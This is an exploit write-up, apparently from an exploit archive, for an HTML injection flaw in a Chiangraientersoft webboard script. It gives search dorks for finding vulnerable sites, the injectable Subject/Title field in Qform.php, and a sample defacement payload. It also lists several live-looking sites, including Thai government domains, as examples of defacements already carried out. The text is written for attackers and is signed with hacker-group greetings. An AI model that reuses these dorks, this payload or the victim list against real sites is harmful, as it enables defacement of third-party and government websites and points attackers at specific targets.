#Exploit Title 		: Chiangraientersoft HTML Injection
#Author 		: DevilScreaM
#Date   		: 05/10/2013
#Category		: Web Applications 
#Vendor 		: http://chiangraientersoft.com/

#Dork 			
inurl:Qread.php?id_ques=
inurl:webboard/Qread.php?id_ques=

#Vulnerability  	: HTML Injection
#Tested On 		: Windows 7, Ubuntu (Mozila & Chrome)
#Greetz                 : Newbie-Security.or.id, Banjarmasin Hacker, Borneo Hacker, Muslim Hacker


HTML Injection

Vulnerable at 'Qform.php' at Field Subject/Title


*Exploit & POC

http://site-target/[PATH]/Qform.php

At Subject/Title, Input Your HTML, Example HTML

<marquee><font color=Blue size=32>DevilScreaM</font></marquee>


Example Deface with HTML Injection

http://bandai.go.th/webboard/index.php
http://tumboltasai.go.th/webboard/index.php
http://dongmada.go.th/webboard/index.php
http://phayaopuktobchawa.com/webboard/index.php
http://nungphaman.com/board/index.php
http://friends-inter.com/webboard/index.php
http://baannattawadee.com/board/index.php